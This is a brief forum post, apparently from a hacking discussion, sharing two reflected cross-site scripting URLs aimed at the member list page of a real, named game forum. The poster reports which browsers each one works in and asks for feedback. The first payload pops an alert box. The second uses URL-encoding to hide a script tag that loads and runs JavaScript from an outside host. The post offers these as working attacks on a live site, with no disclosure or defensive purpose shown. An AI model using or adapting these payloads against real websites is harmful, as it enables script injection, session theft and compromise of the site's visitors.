http://bbs.conqueronline.com/memberlist.php?memberlist.php?action=getall&what=%22%3E%3Cscript%3Ealert%20('XSS')%3C/script%3E<r=&perpage=25&orderby=username
That works in all browsers. But, the stallowned one errors IE.
http://bbs.conqueronline.com/memberlist.php?memberlist.php?action=getall&what=%22%3E%3C%73%63%72ipt%20%73%72%63%3D%68tt%70%3A%2F%2F%68%61.%63%6B%65%72%73.org%2Fs.%6As%3E%3C%2F%73%63%72%69%70%74%3E<r=&perpage=25&orderby=username
Any thoughts?
-
Kyran